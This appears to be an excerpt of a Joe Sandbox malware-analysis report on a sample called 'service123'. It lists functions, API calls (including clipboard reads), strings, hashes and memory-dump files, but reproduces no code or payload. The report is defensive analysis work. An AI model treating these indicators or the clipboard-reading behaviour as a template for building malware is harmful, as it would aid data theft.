Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: Mutex$ClipboardCreateNumberOpenSequenceSleep
String ID: CuDNObfgqmczoBnKhtUp
API String ID: 3689039344-3051875094
Opcode ID: c7d19df97077f52b2832c75e7adac3b63ece29bfc7fedc82261de7a2f2c39e3c
Instruction ID: 9b7701c845ba5e11f808b74f8a080342f052c5a02b0319dcc1cc9daf8cd0bba0
Opcode Fuzzy Hash: c7d19df97077f52b2832c75e7adac3b63ece29bfc7fedc82261de7a2f2c39e3c
Instruction Fuzzy Hash: D501E4B15083068FDB00EF79C64976BBFF4EB45744F01891CE88893A40E774E48ACBA2

Function 00661296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 006612EB
strlen.MSVCRT ref: 00661323
malloc.MSVCRT ref: 0066132E
memcpy.MSVCRT ref: 00661344

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 5ad1474942ef59d49fd342bf10bafeec9099f578aac0c70a1989f47396ee3667
Instruction ID: bcf99675dd6b64e63f18b679cfa30229175cebb4816b2ad7fb987c2d617cf4f0
Opcode Fuzzy Hash: 5ad1474942ef59d49fd342bf10bafeec9099f578aac0c70a1989f47396ee3667
Instruction Fuzzy Hash: 483114B5E043158FCB20DF64D890399BBF2FB49304F098A2DD949AB311D771A946CF81

Function 006613BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 006612EB
strlen.MSVCRT ref: 00661323
malloc.MSVCRT ref: 0066132E
memcpy.MSVCRT ref: 00661344

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 507de53c516b85479184386f587f79bbd66048c6cdc63fbfa98cda6042a50888
Instruction ID: a010bb23003bdb92db35e1a9a1b710864ad4ecae6e4e9a1de8b60414c677b178
Opcode Fuzzy Hash: 507de53c516b85479184386f587f79bbd66048c6cdc63fbfa98cda6042a50888
Instruction Fuzzy Hash: 612104B5E053018FCB50DF65D89069DB7F2FB89304F158A2DD948AB310DB70A906CF85

Function 6C95B1A0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed2b9c42536d2b90a5f67f618955e941627278c6a921379562011bed79a2a73e
Instruction ID: e91d5388ea76db69c98124bc1255beabc3f348add61fd0597c7514b505798613
Opcode Fuzzy Hash: ed2b9c42536d2b90a5f67f618955e941627278c6a921379562011bed79a2a73e
Instruction Fuzzy Hash: 125179B5A093168FDB04DF6ED08151ABBF0BFA5308B95855DD8588BF10E730E855CBA2

Function 6C95B310 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0c47d090cd4c6525b4eb9177afc086a5d80753c689f9e54b8242bbf62a3d755
Instruction ID: 709344a134e839cfed40f7dc893b0d838cfd428555ff70034d559e6e352fbc23
Opcode Fuzzy Hash: a0c47d090cd4c6525b4eb9177afc086a5d80753c689f9e54b8242bbf62a3d755
Instruction Fuzzy Hash: D331E0B1B063118FEB15DF29C4C121A77B8BF56308B8886ACC9148BF55E334D406CB62

Non-executed Functions

Function 6C94CD00 Relevance: 33.4, APIs: 22, Instructions: 445stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C94CD7D

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: bcfe5ffdb224bc5e79443648a912710d28d17f996c4b3190ecf7db7ee43766d0
Instruction ID: ab7e53d10ca918d281a38d2532395f1136333dbb99aa5048e3b7d18f5103a8a7
Opcode Fuzzy Hash: bcfe5ffdb224bc5e79443648a912710d28d17f996c4b3190ecf7db7ee43766d0
Instruction Fuzzy Hash: 0F0206725087518FD700CF29C044795FBE2AF86318F19C6AED8A85BB92D376E94DCB81

Function 6C950FC0 Relevance: 22.6, APIs: 8, Strings: 4, Instructions: 1647stringCOMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C950FCA
strlen.MSVCRT ref: 6C950FD4

Strings

, xrefs: 6C95240F
!, xrefs: 6C952C08
5, xrefs: 6C9514D2
inity, xrefs: 6C951E21

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: localeconvstrlen
String ID: $!$5$inity
API String ID: 186660782-1328200385
Opcode ID: 8a99546a33841b0fb412dcfa0d97eb9d2c609c19f730a559ce324fb41ee82b44
Instruction ID: 9e17376e813ae37484cf48391ab7d1defc2594f45bc31b4399b8102495922947
Opcode Fuzzy Hash: 8a99546a33841b0fb412dcfa0d97eb9d2c609c19f730a559ce324fb41ee82b44
Instruction Fuzzy Hash: DFF24775A08781CFD724CF28C08479ABBE0BF8A348F91892EE8D997750D775E855CB42

Function 6C9C8280 Relevance: 17.7, Strings: 14, Instructions: 166COMMON

Download Yara Rule

Strings

rand_s, xrefs: 6C9C8467
default, xrefs: 6C9C829F
rdrnd, xrefs: 6C9C83C8
random_device::random_device(const std::string&): unsupported token, xrefs: 6C9C8482
rdrand, xrefs: 6C9C8358
Auth, xrefs: 6C9C8426
rdseed, xrefs: 6C9C82C8
hardware, xrefs: 6C9C8450
Genu, xrefs: 6C9C841E
Auth, xrefs: 6C9C8397
Auth, xrefs: 6C9C82FF
random_device::random_device(const std::string&): device not available, xrefs: 6C9C8348
Genu, xrefs: 6C9C8307
Genu, xrefs: 6C9C838F

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memcmpstrlen
String ID: Auth$Auth$Auth$Genu$Genu$Genu$default$hardware$rand_s$random_device::random_device(const std::string&): device not available$random_device::random_device(const std::string&): unsupported token$rdrand$rdrnd$rdseed
API String ID: 3108337309-1359127009
Opcode ID: 875f7dc9c58538908387ae384dce7d9b57817d790bb1ae6e86e36b4ea00b7a87
Instruction ID: ed61e019896ae9671343ff0e877216b3e3a867df96d8a01f3851822b11faacb5
Opcode Fuzzy Hash: 875f7dc9c58538908387ae384dce7d9b57817d790bb1ae6e86e36b4ea00b7a87
Instruction Fuzzy Hash: 7B4148F13193414BE308AA39989135BBABABB50318F64493FD89197F91F739D584C317

Function 6C94EE50 Relevance: 12.5, APIs: 8, Instructions: 494COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C94F18B
malloc.MSVCRT ref: 6C94F1A8

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 4e418346afad33840ac823eb801c91dbd24219a3be74839fe97ba773cba4ef9c
Instruction ID: 070ecbaa020872e09a0d3a5bd044529ca456a21cefaabd5aec6e2af36635a075
Opcode Fuzzy Hash: 4e418346afad33840ac823eb801c91dbd24219a3be74839fe97ba773cba4ef9c
Instruction Fuzzy Hash: A71269756087068FC714CF19C08061AF7E6BFC8358F55CA6DE8A997B50E730E90ACB92

Function 6C96E490 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 219stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C96E4BA
strlen.MSVCRT ref: 6C96E52A

Strings

basic_string: construction from null is not valid, xrefs: 6C96E61F, 6C96E670, 6C96E6C0
basic_string: construction from null is not valid, xrefs: 6C96E4F2, 6C96E562, 6C96E5D2

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
API String ID: 39653677-1250104765
Opcode ID: 8dbc57b86178bf61f76821e96065d81eb37ce6579d5451dae52c00816302a1eb
Instruction ID: ac578a7327a2e0910e6e1bf4fbd368e2dbf2ef6d6409f4b242d88d160c96f4c2
Opcode Fuzzy Hash: 8dbc57b86178bf61f76821e96065d81eb37ce6579d5451dae52c00816302a1eb
Instruction Fuzzy Hash: 5561A3F1A057148FCB00FF2CD88585ABBE4BF55218F46496DE8849BB11E335E899CBD2

Function 6C960610 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C960636
memcmp.MSVCRT ref: 6C960659
memcmp.MSVCRT ref: 6C9606CF
memcmp.MSVCRT ref: 6C960741

Part of subcall function 6CA0AB60: strlen.MSVCRT ref: 6CA0AB6E

memcmp.MSVCRT ref: 6C9607D5

Strings

basic_string::compare, xrefs: 6C960678, 6C9606EC, 6C96075F, 6C9607F4, 6C960810
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C960680, 6C9606F4, 6C960767, 6C9607FC, 6C960818

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 070654197609295f42fdf3bcfc3b881e998f9f33fd482f08fadafdda187a016b
Instruction ID: 0c91b9815e764cce1dd0cfd50049474e4ecd0d89379c49f202e19db4f09e9f47
Opcode Fuzzy Hash: 070654197609295f42fdf3bcfc3b881e998f9f33fd482f08fadafdda187a016b
Instruction Fuzzy Hash: A5616B756093059FD300EF2ED9C041EFBE5AFD9B88F55892DE88887B10D231D885DB56

Function 6C959B99 Relevance: 10.6, APIs: 7, Instructions: 81clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 6C959BA0
GetClipboardData.USER32 ref: 6C959BE7
GlobalLock.KERNEL32 ref: 6C959BF9
GlobalUnlock.KERNEL32 ref: 6C959C1A
CloseClipboard.USER32 ref: 6C959C23

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 52f8eeccd06ac16accf27123c9fb2643f87510c770a4c48bbae67969d04fe1e1
Instruction ID: 59d8f483c6edb5ddda6c74957c8035b36b739c4d6b3bdd75fb89525c84c5ed56
Opcode Fuzzy Hash: 52f8eeccd06ac16accf27123c9fb2643f87510c770a4c48bbae67969d04fe1e1
Instruction Fuzzy Hash: CA214FB2A083028FEB04FF79D54926E7BF5AB65314F458A3CD88987640EB34D4198B53

Function 6C9570C0 Relevance: 9.6, APIs: 6, Instructions: 649COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C9570C7
memset.MSVCRT ref: 6C957217

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: localeconvmemset
String ID:
API String ID: 2367598729-0
Opcode ID: 6183e8e598b0f958c159e7ff58cb32e72725896452264aa121ddc5d6c6376f97
Instruction ID: 459f98bad921ba8c35236d905be83247681f8518bf95d7534283ca62510fdafb
Opcode Fuzzy Hash: 6183e8e598b0f958c159e7ff58cb32e72725896452264aa121ddc5d6c6376f97
Instruction Fuzzy Hash: 5F4213716293018FD700CF29C48035ABBE6BF85308F95C96DE8948BB81D775EB59CB92

Function 6C955880 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 6C956D95
NaN, xrefs: 6C955B5F
, xrefs: 6C957074
Infinity, xrefs: 6C955BE0

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID: $ $Infinity$NaN
API String ID: 0-3274152445
Opcode ID: 5469876b41667b5296def2a4f7c2b5892a202e0f48d0baa86d8a1b3b8bb22dad
Instruction ID: 1b89e4acaa0a2c9cb1befc8fd4ea057d22db6f8352321c1671a33d686a490c09
Opcode Fuzzy Hash: 5469876b41667b5296def2a4f7c2b5892a202e0f48d0baa86d8a1b3b8bb22dad
Instruction Fuzzy Hash: 2FE230B1A093818FD310CF29C18075ABBF0BF89748F94891EE89497751E775E869CF82

Function 006651B0 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 006666C5
, xrefs: 006669A4

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: a73f9c1d14a63c897d58442143e32604e9d528f33d3d1ff1864ea6fc583efe66
Instruction ID: 8a25464f1d96602faac4b65cdcd72a65b2045f11ef7bbda283b355d53888dba5
Opcode Fuzzy Hash: a73f9c1d14a63c897d58442143e32604e9d528f33d3d1ff1864ea6fc583efe66
Instruction Fuzzy Hash: D0E231B1A087818FD720DF29C18175AFBE2BF88744F14891DF89A97361E775E8458F82

Function 6C9544F0 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

gfff, xrefs: 6C9545FC
@, xrefs: 6C9546A9
., xrefs: 6C9547E4
gfff, xrefs: 6C954613

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction ID: 79552bdb6f8aeb1c2f0c08768af5ddec2a7c0a28f0816dc31ce60c00194b4e08
Opcode Fuzzy Hash: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction Fuzzy Hash: 44D1D571A097058BD744CF29C48434BB7E6AFC5748F98C92DE8988BB45E770D9398F82

Function 00663E20 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

gfff, xrefs: 00663F2C
., xrefs: 00664114
gfff, xrefs: 00663F43
@, xrefs: 00663FD9

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction ID: ceb7ed1ea610fc9b4f57f0db95abb3ed437763c5bcdfcfbef42ac4f4aa5a748b
Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction Fuzzy Hash: 47D1B071A083168BD714DF29C89036BBBE3AF95344F18C92DE8988B345DB71DD498B92

Function 6C9E2EF0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

basic_string: construction from null is not valid, xrefs: 6C9E3000

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID: basic_string: construction from null is not valid
API String ID: 0-2991274800
Opcode ID: a69fe528ff251c38cf226463f5f91985be1dce1555860b9646e4bc6cc624aa33
Instruction ID: 8c4ce563ae9cd5a6d98cf1fc49c6c4b7e79fba46aa5a1b7e96fc14cf9b828bde
Opcode Fuzzy Hash: a69fe528ff251c38cf226463f5f91985be1dce1555860b9646e4bc6cc624aa33
Instruction Fuzzy Hash: 06418CB29097118FC715DF2DD48065AFBE4EFA9314F15C96EE8988B315D330D845CBA2

Function 6C9E04E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C9E0550
memset.MSVCRT ref: 6C9E0574

Strings

basic_string::_M_replace_aux, xrefs: 6C9E05F0

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memmovememset
String ID: basic_string::_M_replace_aux
API String ID: 1288253900-2536181960
Opcode ID: 0cbf8b2a9bef63b691ff5f6c149a07f10a75341b667f52916d8bfb9981d85895
Instruction ID: 875ffffa4b1f1b7538f85903bbdcfdcc007ac25328176856f32969f35ae986d3
Opcode Fuzzy Hash: 0cbf8b2a9bef63b691ff5f6c149a07f10a75341b667f52916d8bfb9981d85895
Instruction Fuzzy Hash: 4A319275A097908FC702DF2DC4C062ABBF5AFEA204F18995DE8988B705DB31C844EB52

